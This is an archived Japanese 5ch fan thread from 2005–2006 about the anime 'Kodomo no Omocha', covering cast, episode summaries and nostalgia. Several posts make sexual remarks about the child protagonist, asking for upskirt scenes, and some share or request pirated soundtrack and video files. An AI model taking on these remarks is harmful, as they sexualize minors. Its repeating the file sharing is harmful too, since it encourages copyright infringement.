5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

こどものおもちゃ 2時限目 ♪ 少6隊フゥー!♪

1 :綾乃花丸小路智美:2005/11/05(土) 13:18:00 ID:x7yAUwTE
   ◇ 筆舌に尽くしがたいキャラ(主に紗南ちゃん)のアクションで ◇
   ◇ 重いテーマを前向きでハイテンションな紗南ちゃんが真っ向 .◇
   ◇ 受け止めてゆく姿を描いた、おバカでハートウォーミングで  ◇
   ◇ 抱腹絶倒なアニメ界の大問題作がこどものおもちゃ。略して ◇
   ◇ 「こどちゃ」。小学生編と中学生編に分けられ小学生編は  ◇
   ◇ 間違いなく傑作だが、中学生編は紗南ちゃんのキレが全く  ◇
   ◇ 無くなるドロドロの恋愛テーマという展開が一般的に不評。  ◇

【 前スレ 】
こどものおもちゃ
http://anime.2ch.net/test/read.cgi/ranime/1051820403/

【基本データ】
放送期間: 1996年4月5日〜1998年3月27日(テレビ東京系列)全102話
原作者: 小花美穂 (集英社:りぼん)
キャラクターデザイン:渡辺はじめ 
総作画監督:時永宜幸
美術監督:土師勝弘
撮影監督:羽山泰功
音響監督:山田智明
音楽:冨田恵一/安部純/武藤星児
シリーズ構成・演出協力:高橋良輔
監督: 大地丙太郎
プロデューサー:小林教子(テレビ東京)・松下洋子(NAS)
アニメーション制作:スタジオぎゃろっぷ
制作:テレビ東京・NAS

オープニング曲: TOKIO「19時のニュース」
          :篠原ともえ「ウルトラリラックス」
エンディング曲: Still Smaile Voice「パニック!」
         :引田とも子 with ばびっと隊「DAIJO-BU」
         :知念里奈「PINCH〜Love Me Deeper」

2 :綾乃花丸小路智美:2005/11/05(土) 13:19:33 ID:x7yAUwTE
【 キャスト 】

小田静枝(倉田紗南)
中崎達也(羽山秋人)
生駒治美(松井風花)
南央美(加村直澄)
木野花(倉田美紗子)
内藤玲(相模玲)
三澤真弓(佐々木剛)
ぜんじろう(ぜんじろう)
菊地晶子(杉田亜矢)
引田智子(白こうもり/ばびっと)
岡村明美(羽山夏美)
松山鷹志(羽山父)
高橋広司(五條武史)
小西寛子(中尾翔太)

少6隊 (劇中アイドル:必聴・必見!)
・倉田紗南(小田静枝)・・・元気っ娘
・綾乃花丸小路智美(西村智美)・・・天然
・飛田まゆ(麻生かほ里)・・・ツンデレ

3 :綾乃花丸小路智美:2005/11/05(土) 13:20:22 ID:x7yAUwTE
【 関連スレ 】

《29chスレッドタイトル検索「こどものおもちゃ」》

http://makimo.to/cgi-bin/search/search.cgi?shw=100&q=%82%B1%82%C7%82%E0%82%CC%82%A8%82%E0%82%BF%82%E1&andor=AND&sf=1&H=&all=on&view=table


【企業・情報系リンク】

りぼん(集英社) 〓 原作掲載誌
http://ribon.shueisha.co.jp/

コミックス検索(集英社)
http://www.s-manga.net/search/search2.html

スタジオぎゃろっぷ 〓 TV版制作
http://www.anime-gallop.co.jp/

アニプレックス(旧名「SME・ビジュアルワークス」&「SPE・ビジュアルワークス」) 
〓 DVD発売元(LD発売は「ソニー・ミュージック・エンターテインメント」)
http://www.sonymusic.co.jp/Animation/

テレビアニメ放映資料「こどものおもちゃ」(全話サブタイ他)
http://home-aki.cool.ne.jp/anime-list/kodocha.htm

こどものおもちゃ(はてなダイアリー)
http://d.hatena.ne.jp/keyword/%A4%B3%A4%C9%A4%E2%A4%CE%A4%AA%A4%E2%A4%C1%A4%E3

こどものおもちゃ(Wikipedia)
http://ja.wikipedia.org/wiki/%E3%81%93%E3%81%A9%E3%82%82%E3%81%AE%E3%81%8A%E3%82%82%E3%81%A1%E3%82%83

4 :綾乃花丸小路智美:2005/11/05(土) 13:21:12 ID:x7yAUwTE
【 ファンサイト系リンク 】(有名どころは軒並み閉鎖)

こどちゃのお部屋
http://www.asahi-net.or.jp/~vp4k-mte/kodocha/kodocha.html
こどちゃな部屋
http://www.geocities.co.jp/HeartLand/7503/kodocha.html
激! 紗南ちゃん一家
http://www.owarikomaki.net/sana/
こどものおもちゃのぺーじ
http://www.page.sannet.ne.jp/t-takagi/tokimeki/kodocha.htm

     ・
     ・
     ・
『今はこれが精一杯・・・』

5 :綾乃花丸小路智美:2005/11/05(土) 13:25:01 ID:x7yAUwTE
いじょ。

ネタ少ないから、次回テンプレ用に【 好きなセリフ 】とか
【 好きなラップ 】とか募集してみたらどうだろうか?


6 :名無しか・・・何もかも皆懐かしい:2005/11/05(土) 15:19:23 ID:???
コーンフレークッスー
はいよはいよ!

7 :名無しか・・・何もかも皆懐かしい:2005/11/05(土) 15:22:29 ID:???
私はココで、ドントクライフォーミーをもらったよ☆

8 :名無しか・・・何もかも皆懐かしい:2005/11/05(土) 18:39:37 ID:???
DVDって6話収録で4千円だったの?

9 :名無しか・・・何もかも皆懐かしい:2005/11/05(土) 22:57:53 ID:???
たんたんたーたっ
たったったったったーたったー





10 :名無しか・・・何もかも皆懐かしい:2005/11/05(土) 23:34:03 ID:???
灼眼の紗南

11 :名無しか・・・何もかも皆懐かしい:2005/11/06(日) 04:33:21 ID:???
主人公の声優の漢字間違うなよ、しかもテンプレで・・・

12 :名無しか・・・何もかも皆懐かしい:2005/11/06(日) 04:39:33 ID:???
>>11
君が正しいと思ってる漢字を書いてみたまえ。

13 :名無しか・・・何もかも皆懐かしい:2005/11/06(日) 10:56:46 ID:???
ほんとだ!靜だよ!

14 :名無しか・・・何もかも皆懐かしい:2005/11/06(日) 11:21:28 ID:???
小田靜枝

15 :名無しか・・・何もかも皆懐かしい:2005/11/06(日) 15:39:02 ID:???
> 筆舌に尽くしがたいキャラ(主に紗南ちゃん)のアクションで 
> 重いテーマを前向きでハイテンションな紗南ちゃんが真っ向
> 受け止めてゆく姿を描いた、おバカでハートウォーミングで 
> 抱腹絶倒なアニメ界の大問題作がこどものおもちゃ。略して
> 「こどちゃ」。小学生編と中学生編に分けられ小学生編は  
> 間違いなく傑作だが、中学生編は紗南ちゃんのキレが全く 
> 無くなるドロドロの恋愛テーマという展開が一般的に不評。 

↑これいらないと思う


16 :名無しか・・・何もかも皆懐かしい:2005/11/06(日) 17:24:43 ID:???
フゥーとかやらなくていいよ

17 :>>1:2005/11/06(日) 17:48:32 ID:???
うは!評判テラワロ(´・ω・) ス

気に入らなかったら別スレ立ててここは落としてくれ(´・ω・) ス
漏れもここを粘着保守はしないから。

>>11
ごめんねぇ〜、某大手サイトのをコピペしただけだから
間違ってるとは思わなかったよ。

>>16
少6隊の「フゥー」を認めないおまいの言う事を聞く気はない(´・ω・) ス

18 :名無しか・・・何もかも皆懐かしい:2005/11/07(月) 01:53:41 ID:???
某大手サイトは役に立たんな

19 :名無しか・・・何もかも皆懐かしい:2005/11/12(土) 18:11:25 ID:???
まてまて!
細かく訂正→少六隊

20 :名無しか・・・何もかも皆懐かしい:2005/11/12(土) 20:35:09 ID:???
ここで天使のような俺が登場、

>>1乙!

21 :名無しか・・・何もかも皆懐かしい:2005/11/12(土) 21:07:57 ID:???
ここでエンジェルのような俺が登場、

>>1乙!

22 :名無しか・・・何もかも皆懐かしい:2005/11/12(土) 21:23:34 ID:???
http://www.sanspo.com/geino/top/gt200509/gt2005091402.html
↑「ウルトラリラックス」フランスでも人気

前スレの最後の方でちょと話題になってましたね

23 :名無しか・・・何もかも皆懐かしい:2005/11/12(土) 22:25:03 ID:???
さすがにまったく賑わってないな・・
数あるアニメの中でもっとも泣いたのがこの作品だ・・・・ほんと号泣(T△T)
まぁあのころ精神的に痛かったからかもしれんがorz

24 :名無しか・・・何もかも皆懐かしい:2005/11/13(日) 00:26:34 ID:???
>>23
最近は特にレスが少ないみたいですね。(今日は結構あるけど)
だけど突然レスが急増することもあるし
今のマターリ雰囲気もけっこう好き(´・ω・)ノ

自分も号泣というほどじゃないけど、ポロポロ涙流したよ(´;ω;`)
関係ないが、今のテレビ東京系列のアニメとか
見ると違う意味で泣ける_| ̄|○



25 :名無しか・・・何もかも皆懐かしい:2005/11/14(月) 08:31:48 ID:???
私もあんなに泣いた漫画はこどちゃしかない!

26 :名無しか・・・何もかも皆懐かしい:2005/11/14(月) 17:50:14 ID:???
いやホント泣けましたね。小学生編の病院でのやりとりにメッチャ泣いたの覚えてます
なんかヘビっぽい新聞記者?が基本的に悪キャラなのに良い奴になって泣いてたのみてもらい泣き(T△T)
紗南の母「しばらくの間この事(紗南の父であるという事?だったか病気の事だったか)は黙ってて」と口止め料を渡そうとする・・
ヘビっぽい記者「もう助からないんだよ!!あんまりじゃねぇか・・・やっと会えたってのに・・」でヘビ泣く
なぜなら奴は病院のカルテを見て紗南の父親がもう助からないのを知ってたのですよ・・・

運命的に巡り会えた二人・・しかし紗南のほうは不思議な好意を抱きつつも父親とは知らず・・
やっと二人の思い出を作り始めたのに・・病魔がそれを許さない(T△T)


なんかこのスレ見つけて懐かしく長々と書いてしまった^^;久々にこどちゃを思い出した・・・

27 :名無しか・・・何もかも皆懐かしい:2005/11/14(月) 21:58:50 ID:5i6bu0p9
>>22
篠原ともえってまだ生きてるのか?

28 :名無しか・・・何もかも皆懐かしい:2005/11/14(月) 23:28:11 ID:???
この前フツーにTV出てた

29 :名無しか・・・何もかも皆懐かしい:2005/11/15(火) 23:06:44 ID:???
スレ速度が遅いのは当然じゃない?
アニメが終わってからもう7年建ってるし

しかしこのアニメ 監督が出過ぎじゃない?とか思うんだが

東大和実吉(ぜんじろうのマネージャー)
熊さん
タクシードライバー
とか

30 :名無しか・・・何もかも皆懐かしい:2005/11/16(水) 15:29:12 ID:???
監督最高やん!!!!!!ノーギャラだし。(DVDにあの頃僕らは紗南だったに書いてた)

31 :名無しか・・・何もかも皆懐かしい:2005/11/18(金) 04:34:58 ID:LC+2BoYr
中学生編がなぜかゲオにないよ〜(/_;)続きが見たい!!TSUTAYAはこどちゃ自体がない!どっかありますか??

32 :名無しか・・・何もかも皆懐かしい:2005/11/18(金) 04:57:24 ID:???
TSUTIAYHAに置いてありますよ^^

33 :名無しか・・・何もかも皆懐かしい:2005/11/18(金) 13:12:20 ID:???
DVDやビデオ版はカットされているのでAT−Xでノーカット版がみたいよ〜。

34 :名無しか・・・何もかも皆懐かしい:2005/11/19(土) 01:12:51 ID:???
DVDやビデオ版はどのシーンがカットされてるの?

35 :名無しか・・・何もかも皆懐かしい:2005/11/19(土) 02:22:57 ID:???
アメリカから帰った羽山がHに持ち込もうとして紗南も半分その気になっちゃうんだけど
紗南の携帯が鳴っておじゃんになるシーンじゃない?

36 :名無しか・・・何もかも皆懐かしい:2005/11/19(土) 15:16:02 ID:???
それマンガのほうの話じゃなかったか?

37 :名無しか・・・何もかも皆懐かしい:2005/11/20(日) 12:15:59 ID:???
いや、漫画版にそんなシーンは無い。
紗南が人形病だかで羽山を誘う話ならあるけど

38 :名無しか・・・何もかも皆懐かしい:2005/11/20(日) 17:04:52 ID:???
>>35は漫画の最終話のことだと思うよ

39 :名無しか・・・何もかも皆懐かしい:2005/11/20(日) 23:39:00 ID:???
>>35
漫画の最終回=りぼん11月号
アニメの最終回=3月27日
だから そのシーンがカット以前の話です。

40 :名無しか・・・何もかも皆懐かしい:2005/11/24(木) 21:29:58 ID:???
監督の掲示板に書かれてるけど
羽山役の中アは芸能界引退したらしい。


41 :名無しか・・・何もかも皆懐かしい:2005/11/27(日) 12:04:39 ID:???
中崎さんが?!?!すごくすごくすごくすごく残念

42 :名無しか・・・何もかも皆懐かしい:2005/12/10(土) 10:23:48 ID:c7DQVd4+
あげますよ

43 :名無しか・・・何もかも皆懐かしい:2005/12/16(金) 22:43:28 ID:???
これアニメのほうが先に終了したんだな。
原作見返してて思い出してここに来たんだが
アニメの最後らへんはどんな話で終わったんだ?

44 :名無しか・・・何もかも皆懐かしい:2005/12/17(土) 02:38:34 ID:???
第99話
紗南は空手を認めさせようと空手部をつくってはどうかと羽山にもちかける。部と認められるには五人の部員が必要。紗南、羽山とマユゲボーンと羽山のクラスメートの中尾と四人がそろった。取り合えず備品室を仮の部室にするが、千石が黙っているはすがなかった。

45 :名無しか・・・何もかも皆懐かしい:2005/12/17(土) 02:55:26 ID:???
第100話
羽山と練習をした中尾は、疲労で倒れた。部を休んだことを謝ろうとした中尾を、退部したがっていると思い込んだ羽山は親切のつもりで空手は無理だと言ってしまう。羽山に見捨てられ、尊敬していた千石にまで存在を覚えられていなかった中尾

46 :名無しか・・・何もかも皆懐かしい:2005/12/17(土) 02:56:08 ID:???
は手紙を残し行方不明になってしまう。その手紙を見つけた千石は自分に都合の悪い事が書かれているページを隠し、中尾の失踪の原因を全部羽山に押し付けた。

47 :名無しか・・・何もかも皆懐かしい:2005/12/17(土) 03:03:33 ID:???
第101話
中尾は依然として見つからず、空手部を潰しにかかった千石は容赦がない。石田も退部してしまい、残った羽山と紗南はまるで犯罪者扱い。そんな二人をかばってくれたのは、神保小の仲間たちと風花だった。黒板消しのヒントから中尾が部室に居るのではないかと

48 :名無しか・・・何もかも皆懐かしい:2005/12/17(土) 03:11:49 ID:???
第102話
中尾、紗南、羽山は救出された。中尾は衰弱していたが、命に別状はなく、羽山との誤解もとけた。しかし千石はこの事件の責任を羽山に押し付け、羽山を停学処分にしようと躍起になる。そんな時風花は千石の机から隠された手紙を発見してしまう。

49 :名無しか・・・何もかも皆懐かしい:2005/12/17(土) 03:12:59 ID:???
会議に乗り込む紗南と風花たち。結局羽山は退学をまのがれ、千石は学校を去っていった。一見落着し、平和が戻った紗南と羽山に春が近づいていた。

50 :名無しか・・・何もかも皆懐かしい:2005/12/17(土) 08:34:30 ID:???
そんで屋上でちゅーすんの
そんで空手の試験に全然うからない

51 :名無しか・・・何もかも皆懐かしい:2005/12/17(土) 15:03:25 ID:???
>>44-50
うおこんなに詳しくありがとう
ざっと過去スレ見返したんだが展開が違ってもアニメも後半は鬱だったんだな
今度見てみよう

52 :名無しか・・・何もかも皆懐かしい:2005/12/23(金) 20:27:20 ID:???
>>27
遅レスだが、ガッシュベルのED歌ってた

53 :名無しか・・・何もかも皆懐かしい:2005/12/24(土) 02:39:21 ID:???
わしも今日ガッシュ初めて見て、知った。
声がブリブリ

54 :名無しか・・・何もかも皆懐かしい:2006/01/05(木) 06:18:11 ID:???
こんなスレあったんか。
しかし人おらんな。オーケーベイビーズロック!

55 :名無しか・・・何もかも皆懐かしい:2006/01/06(金) 13:19:04 ID:QmI2i3PC
この作品って舞台浜田山だっけ?

56 :名無しか・・・何もかも皆懐かしい:2006/01/06(金) 18:43:11 ID:43GIa06K
なんかねぇ・・・
そんなたいしたことないでしょっって感じのことを
羽山とかが言って、ぞっとなる先生、みたいなシーン
が今となってはなんかむずがゆいww
でも世代なのでりぼん買って読んでました。

57 :名無しか・・・何もかも皆懐かしい:2006/01/07(土) 20:54:30 ID:???
派手な話がずっと来てて、最後に地味な話をもってくるのが、良かった。

58 :名無しか・・・何もかも皆懐かしい:2006/01/07(土) 20:58:56 ID:???
知念里奈懐かしいな・・・今どうしてるんだろ?
夕焼けがどうとかいう歌が好きだった。


59 :名無しか・・・何もかも皆懐かしい:2006/01/10(火) 23:00:21 ID:???
バビット数え歌って見れるサイトある?

60 :名無しか・・・何もかも皆懐かしい:2006/01/13(金) 15:08:19 ID:???
ちょっと6話まで見てみたんだが
や べ ぇ ! !
アニメで泣けてくるなんて何年ぶりだこれ

61 :名無しか・・・何もかも皆懐かしい:2006/01/13(金) 16:46:44 ID:???
6話は何の話かと思ったが、

親子丼バカまずくて食えん

か。ロンリーウルフ羽山の家族のゴタゴタを紗南が解決する話か。まだまだ序の口だな。

62 :名無しか・・・何もかも皆懐かしい:2006/01/13(金) 17:08:27 ID:???
だが初めてはあのジャブ加減がちょうど良い

63 :名無しか・・・何もかも皆懐かしい:2006/01/23(月) 02:07:34 ID:???
今になってはまった…
一応世代だったのにサミシス

64 :名無しか・・・何もかも皆懐かしい:2006/01/23(月) 20:08:15 ID:???

     ミミ ヽヽヽヽリリノノノ   あ、ありのまま 今 起こったことを話すぜ!
    ミu  ,,、,、,、,、,、,、,、、 彡  
     l u iiiii  u u  u|||i  『ホリエモンと呼ばれていたのに
     | 」|||u  ⌒' '⌒u|   いつの間にかムイチモンになっていた』
    ,r-/||||||<・> < ・> |    
    l  |||u u ノ( 、_, )ヽ u|  な・・・ 何を言ってるのか わからねーと思うが
    ー'  u ノ、__!!_,.、 |  おれも 何をされたのか わからなかった・・・
    ∧  u  ヽニニソ  l  
   /\ヽ    u  u /   新球団問題とかフジテレビ騒動とかそんなチャチなモンじゃ断じてねぇ
 / u   ヽ.  `ー--一' ノ/ヽ  もっと恐ろしいものの片鱗を味わったぜ・・・

65 :名無しか・・・何もかも皆懐かしい:2006/01/24(火) 13:02:40 ID:???
あんな男にどうして惚れたの〜

66 : ◆pf3bu2R0Ws :2006/01/27(金) 14:41:00 ID:???
パンチラって何話にあるの?

67 :名無しか・・・何もかも皆懐かしい:2006/01/29(日) 20:40:50 ID:X7yp6Lpo
俺はサナちゃんみたいな人が好きだけど、サナちゃんみたいな人は俺みたいな人間と付き合うと不幸になるだけなんだ。俺が依存したいだけなんだ。サナちゃん系の人と付き合っても彼女の友達に引け目を感じてしまうクソつまんねぇ男だ俺は!

68 :名無しか・・・何もかも皆懐かしい:2006/01/29(日) 23:36:21 ID:???
安心しろ、たぶん同じクラスにいてもお前の事には気づかないから
かといって樹海にはいかないよーに。

69 :名無しか・・・何もかも皆懐かしい:2006/01/30(月) 00:09:48 ID:L4tPziS4
今は樹海には行かんよ。キャラ的にはサナの実父・武ちゃんみたいなもんだよ。せいぜい、人生に諦めついてるような女とバカやって行き詰まったら一緒に死ぬというのが一番幸せな生き方だ。

70 :名無しか・・・何もかも皆懐かしい:2006/01/30(月) 06:58:32 ID:iU/yguhs
おまえ等こどちゃみてたらママレードボーイも見てたろ。

71 :名無しか・・・何もかも皆懐かしい:2006/01/30(月) 11:54:34 ID:u9HARNv0
>>2
>小田静枝(倉田紗南)
これ以前は広島のローカルタレントだった。よくTSSの番組に出ていたし、
ナレーションもやってた。新聞に名前が載ってたときは意外に思った。(HTVで放送)

三澤真弓(佐々木剛)
役名の字が2号ライダーを演じてた俳優と一緒だ。読みが一緒かは良く分からんが。
リアルでは見てなかったので。


72 :名無しか・・・何もかも皆懐かしい:2006/01/30(月) 22:06:41 ID:???
そういやアイシールド21の第2話で人の重さ人形が出てた

73 :名無しか・・・何もかも皆懐かしい:2006/02/01(水) 13:04:50 ID:NGh0GHeF
中学生の時紗南と直澄がダブル主演していた「水の館」って映画。あとから単行本も出たけど、あれめっちゃおもしろくない?映画作ってた時の様子と作品と両方知ってると何か思い入れてしまった

74 :名無しか・・・何もかも皆懐かしい:2006/02/04(土) 11:46:18 ID:???
水の館はサントラのHarmony of water聴いたら曲と内容が合っていて感動した

75 :名無しか・・・何もかも皆懐かしい:2006/02/04(土) 14:15:10 ID:CJaI7TVo
↑それって抽プレ品だから手に入らないんだよねぇ?(>_<)

76 :名無しか・・・何もかも皆懐かしい:2006/02/04(土) 15:15:55 ID:???
サントラVol.3にあるが何か?

77 :名無しか・・・何もかも皆懐かしい:2006/02/05(日) 20:17:36 ID:???
こどちゃのキャラってみんな好きだぁ♪でも風花だけはあんま好きになれなかった↓↓

78 :名無しか・・・何もかも皆懐かしい:2006/02/06(月) 00:07:08 ID:???
風花ちゃんは良くも悪くも女の子っぽいからな。

79 :名無しか・・・何もかも皆懐かしい:2006/02/06(月) 00:12:38 ID:DjCJdeMB
でもちょっと風花は邪魔だったかも。

80 :名無しか・・・何もかも皆懐かしい:2006/02/06(月) 10:46:44 ID:???
まあ、延長てこ入れで、結果的に大阪から邪魔しにきたようなものだしw

81 :名無しか・・・何もかも皆懐かしい:2006/02/07(火) 02:04:54 ID:dr3cXLlN
でも風花がいなっかたら紗南は羽山が好きな事気づかなかったから、風花がいて良かったと思う。

82 :名無しか・・・何もかも皆懐かしい:2006/02/07(火) 12:01:13 ID:???
もちろんそう。一見おじゃま虫に見えるのがミソ

83 :名無しか・・・何もかも皆懐かしい:2006/02/15(水) 12:36:29 ID:???
ほしゅ

84 :名無しか・・・何もかも皆懐かしい:2006/02/15(水) 21:55:20 ID:N+oUzSHn
久しぶりに、こどものおもちゃのDVDを見たらおもしろかった

85 :名無しか・・・何もかも皆懐かしい:2006/02/16(木) 00:04:39 ID:???
さなちゃんが意外とエロくてね

86 :名無しか・・・何もかも皆懐かしい:2006/02/16(木) 04:41:04 ID:LIaZarpP
風花を違う視点から見ると、風花の気持ちがすごく分かる。
私も小学生のとき、見たら風花大嫌いだった。久しぶりに見たら、風花がカワイソすぎて…orz

87 :名無しか・・・何もかも皆懐かしい:2006/02/16(木) 05:20:44 ID:LIaZarpP
パンチラって……紗南が崖から登るとき…?今見てるんだけど……
白いスカートで、ヒラヒラ〜とめくれたりしてる。

88 : ◆/TNckmK9Ew :2006/02/16(木) 09:24:58 ID:???
>>87
うp!うp!

89 :名無しか・・・何もかも皆懐かしい:2006/02/17(金) 02:28:36 ID:z9vu9U4D
このスレは おとなのおもちゃ となりました

90 :名無しか・・・何もかも皆懐かしい:2006/02/17(金) 08:28:12 ID:???
DAM
ttp://www.clubdam.com/dam/leaf/songKaraokeLeaf.do?contentsId=3758002

UGA
6125-34 DAIJO-BU 引田とも子 with ばびっと隊

91 :名無しか・・・何もかも皆懐かしい:2006/02/19(日) 01:22:32 ID:vn4Z8uoL
頼むっお金無いからDAIJOBUとサントラ3をCDRにこどちゃアニメ本編DVDRにダビングしてくれぃ(。゜´口`゜。)

92 :名無しか・・・何もかも皆懐かしい:2006/02/19(日) 10:59:51 ID:YYU3jlqu
小学生編も好きだけど私は恋愛中心の中学生編の方が好きだな〜。   
さなちゃんが羽山の事を好きって気づく所が良いよね風化の性格が良くなかったらもっとドロドロしてたはず

93 :名無しか・・・何もかも皆懐かしい:2006/02/19(日) 11:08:51 ID:YYU3jlqu
風化みたいな女の子って、めったに居ないよね。  どんなに仲が良くても男の事になると、      女の友情は終わるよ。  風化って本当に凄いよ

94 :うつ休職中:2006/02/20(月) 13:01:10 ID:H2mRfbe0
この漫画、妹がもっててよく読んだよ。
けっこう、ズリネタにした。
しかし、こどものおもちゃっていうタイトルがよくOKだったよな。


95 :名無しか・・・何もかも皆懐かしい:2006/02/25(土) 17:26:38 ID:nwthRW2d
ひさびさにアニメ観たけど、ケイコさんがサナの父は4年前に死んだってこと言ってるんだけど、武ちゃんいるのにおかしくね?

96 :名無しか・・・何もかも皆懐かしい:2006/02/26(日) 02:26:51 ID:???
庵野がカレカノやる時、こどちゃのことを高評価してたね

97 :名無しか・・・何もかも皆懐かしい:2006/02/26(日) 03:42:46 ID:???
大地>庵野

98 :名無しか・・・何もかも皆懐かしい:2006/02/27(月) 02:13:04 ID:???
>>96
成程。
軽快な中ストーリー展開でたまに深刻なシーンが出てくるけど、
あれはカレカノのパターンと酷似してるかも!?

99 :名無しか・・・何もかも皆懐かしい:2006/02/27(月) 04:48:37 ID:WVkW/QzV
羽山はツンデレだな

100 :おっ!?:2006/02/27(月) 07:11:52 ID:Wp297ejy
100ゲッツ!LDに付いてたというサナラップを集めたCD欲しいよ〜!

101 :名無しか・・・何もかも皆懐かしい:2006/02/27(月) 16:12:13 ID:???
何故かこのアニメの事を思い出して来てしまったW
ってか>>35みたいな事あったのか覚えてないや。
これって純粋に爽やかな話じゃなかったっけ?
従姉妹と毎回見てて意外とはまったんだけど
内容忘れちゃった・・・

102 :名無しか・・・何もかも皆懐かしい:2006/03/02(木) 23:46:56 ID:m5WcJNex
トリビアの泉の八嶋さんが声優として出ていたよね

103 :名無しか・・・何もかも皆懐かしい:2006/03/05(日) 05:55:14 ID:???
>>91
それレンタル屋の情報を聞いた方が早いかもしれんぞ。

とりあえず、amazonにはDAIJO-BUはなし。

104 :名無しか・・・何もかも皆懐かしい:2006/03/07(火) 00:11:06 ID:???
3月7日は紗南ちゃんの誕生日♪
3月7日は紗南ちゃんの誕生日♪

おめでたまさぶろう〜!!1

105 ::2006/03/07(火) 02:09:17 ID:???
今日はさなちゃんの誕生日やからワイワイしてると思ったら……かなり……少ない……てか一人やしガクッ

106 :名無しか・・・何もかも皆懐かしい:2006/03/07(火) 02:30:22 ID:???
はいはい、宝島の「このアニメが凄い」で「こどちゃ」を知って、
「港町チャールストン」から見始めた俺様がきましたよ。

紗南のサの字は糸偏ザンス〜♪
奈良の奈でもない、ミナミと書いてナと読むの〜♪

つう事で、誕生日おめでとう。

小学校編は、ビデオで追いかけてみました。
「このアニメが凄い」で予備知識はあったものの、こんなヘビーな内容を
よくぞサクっとエンターテイメントにしちゃいましたね。
丙太郎監督、恐るべし。十兵衛ちゃんも正続両方見ちゃったよ。

107 :名無しか・・・何もかも皆懐かしい:2006/03/07(火) 14:14:58 ID:???
ここ見るまで誕生日の事忘れてたよ…
大地作品なら今、そこにいる僕も良いよ。


108 :名無しか・・・何もかも皆懐かしい:2006/03/16(木) 19:22:04 ID:???
テレビでやってたけど、パリコレかなんかで頭に鳥の巣をつけてたらしい(卵と鳥付き)。ママは流行を先取り。

109 :名無しか・・・何もかも皆懐かしい:2006/03/18(土) 11:24:56 ID:???
原作よりアニメが面白い

110 :名無しか・・・何もかも皆懐かしい:2006/03/22(水) 02:41:50 ID:???
アニメから入ったけど原作も面白いよ。

111 :名無しか・・・何もかも皆懐かしい:2006/03/22(水) 09:41:29 ID:???
小学生編はアニメ、中学生編は原作かな〜…おおざっぱに言うと。
でも脳内で両方を補完させあってるから、どっちも好き。

112 :この歌な〜んだ?:2006/03/24(金) 20:16:53 ID:+pRza881
@羽山の誕生日は10月12日♪あたしだってば3月7日♪真ん中真ん中真ん中の日を♪HAPPYラッキーしようとしたら♪それがピッタリイヴだった〜♪
Aメリークリスマス♪今宵集いて♪主の導きに感謝を込めて♪この世に生まれしすべての愛に♪今宵贈るメリークリスマス♪

113 :名無しか・・・何もかも皆懐かしい:2006/03/27(月) 17:59:24 ID:???
カラオケにビタミンラブが追加されたね!オールウェイズウィズユーも追加…してほしい…
一応今見てたから、写パチッとしたよ☆
http://r3.ne7.jp/t/t.jsp?i=3RTspwMAGRJ0
携帯からでごめんなさい。ココかなぁ?!崖に登ってなかったけど…。>>88 いやほんとこんなんでごめんなさい…(笑)

114 :名無しか・・・何もかも皆懐かしい:2006/03/30(木) 10:06:19 ID:o1iIfTAI
さっきTBSの花丸マーケットで
冒頭の人物紹介〜あらすじ〜サブタイで流れる
SANA SANBAだったけ?が流れてたお。

115 :名無しか・・・何もかも皆懐かしい:2006/04/02(日) 17:04:07 ID:t/IjpKll
現在19歳の女です。 
アニメはほとんどみた事ないんだけど、久々に漫画本を読みました!またサナちゃんにはまっちゃったょ!(≧∀≦)

116 :名無しか・・・何もかも皆懐かしい:2006/04/02(日) 20:38:30 ID:???
偶然ですね私も19歳の女です☆
羽山さいこー!!q(≧∇≦*)(*≧∇≦)p

117 :なみ:2006/04/02(日) 21:20:53 ID:t/IjpKll
115 デス。本間に羽山最高!!!羽山みたいな男と出会ってみたい(≧д≦)  頭の中メルヘン状態ゃわ↑

118 :なみ:2006/04/02(日) 23:20:58 ID:t/IjpKll
こどちゃ、再放送してほしぃ!

119 :名無しか・・・何もかも皆懐かしい:2006/04/05(水) 17:49:25 ID:???
久しぶりに実家に帰ってビデオテープ片付けてたら、こどちゃ発見!思わず見てしまった……ら、泣ける泣ける!
ちょうど、館の映画撮影〜撮影終わりで羽山ひっぱたくまでの放送分が入ってたが自分は中学生編も好きなんで、ハタチ過ぎてドロついた恋愛もある程度して別の見方してまた泣けるっていいなぁと思った
しかも続き気になって今どうしようかと考えているw

120 :名無しか・・・何もかも皆懐かしい:2006/04/09(日) 21:21:28 ID:???
>>119
なかま発見!!
私もこの前ビデオ見付けてみたよ。
館→ニューヨーク前までしかなかったけど
私も中学生編も好きだよ!

121 :名無しか・・・何もかも皆懐かしい:2006/04/15(土) 23:11:15 ID:???

こどちゃ サナサンバ
http://syuseki.2-d.jp/minami/src/minami3989.lzh
こどちゃ ドントクライフォーミー
http://syuseki.2-d.jp/minami/src/minami3990.lzh


122 :名無しか・・・何もかも皆懐かしい:2006/04/16(日) 01:16:52 ID:???
>121
d!

123 :名無しか・・・何もかも皆懐かしい:2006/04/16(日) 01:24:33 ID:???
>121
他のトラックもお願いしますm(_ _)m

124 :名無しか・・・何もかも皆懐かしい:2006/04/16(日) 04:46:55 ID:???
http://search.auctions.yahoo.co.jp/jp/search/auc?p=%A4%B3%A4%C9%A4%E2%A4%CE%A4%AA%A4%E2%A4%C1%A4%E3%A1%A1%A3%E3%A3%E4&auccat=0&alocale=0jp&acc=jp

これの1を買った
欲しいのがあれば言ってね

125 :名無しか・・・何もかも皆懐かしい:2006/04/16(日) 05:27:47 ID:???
音楽関係はヤバいから気軽にうpとかすんな

126 :名無しか・・・何もかも皆懐かしい:2006/04/18(火) 20:27:38 ID:???
>>125
そんな事は気にしないよ

127 :名無しか・・・何もかも皆懐かしい:2006/04/18(火) 23:51:25 ID:inEdqlSQ
19男だけど小学生の頃暇だったんで妹のりぼん読んでたらハマッた。
昨日たまたま本屋で完全版見つけたんで買ってみた。
作品の良さに再び感銘すると同時にあの時代はよかったな〜と(社会的にはイジメ
問題とか不況とかで暗いニュースばっかりだった気がする。)
中年オヤジぽくしんみりした。

128 :名無しか・・・何もかも皆懐かしい:2006/04/19(水) 00:00:40 ID:???
CSで前やってたよね。
またやらないかなー

129 :名無しか・・・何もかも皆懐かしい:2006/04/25(火) 16:51:56 ID:???
前のほうが風化が叩かれてるけど、羽山取られたのはどう見ても紗南の自業自得だと思うのだが…

とか思う俺は(中学生編からの)紗南アンチ

130 :名無しか・・・何もかも皆懐かしい:2006/04/25(火) 16:53:24 ID:???
前のほうが じゃなくて 前のほうで ね

